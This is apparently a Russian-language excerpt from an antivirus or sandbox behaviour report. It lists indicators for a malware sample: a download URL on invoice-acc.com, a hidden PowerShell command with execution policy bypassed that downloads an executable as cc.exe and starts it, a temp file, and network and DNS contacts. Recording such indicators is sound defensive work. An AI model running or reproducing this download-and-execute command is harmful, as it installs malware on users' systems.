Техническая информация
- https://invoice-acc.com/ss/3loyaslado1znlp.exe как cc.exe
- '<SYSTEM32>\cmd.exe' "/c powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -C (New-Object System.Net.WebClient).DownloadFile('https://invoice-acc.com/ss/3loyaSLADo1ZNLp.exe','cc.exe');Start-Process ...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1520
- %TEMP%\1134080.cvr
- 'in###ce-acc.com':443
- 'in###ce-acc.com':443
- DNS ASK in###ce-acc.com